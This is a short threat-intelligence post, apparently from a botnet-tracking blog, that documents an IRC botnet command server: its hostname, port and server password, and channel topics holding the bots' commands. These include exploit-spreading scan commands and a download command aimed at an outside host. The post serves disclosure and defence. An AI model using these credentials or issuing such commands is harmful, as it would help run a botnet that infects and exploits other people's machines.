ppppppp.rsmatcher.com (YABOT irc botnet hosted by China Shantou Shantou Tianyin Technology Co. Ltd)

Resolved ppppppp.rsmatcher.com to

Server:  ppppppp.rsmatcher.com
Port:  6971
Server password:  laorosr
Channel:  #J
Channel topic #J:  .asc -S|.hxxp|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a
Channel:  #dpi
Channel topic #dpi:  !dl hxxp:// rsxjs.com 1 -s

This bot is downloaded as msx6971.exe by the m.jamtes botnet.

Hosting infos: http://whois.domaintools.com/

Categories: Uncategorized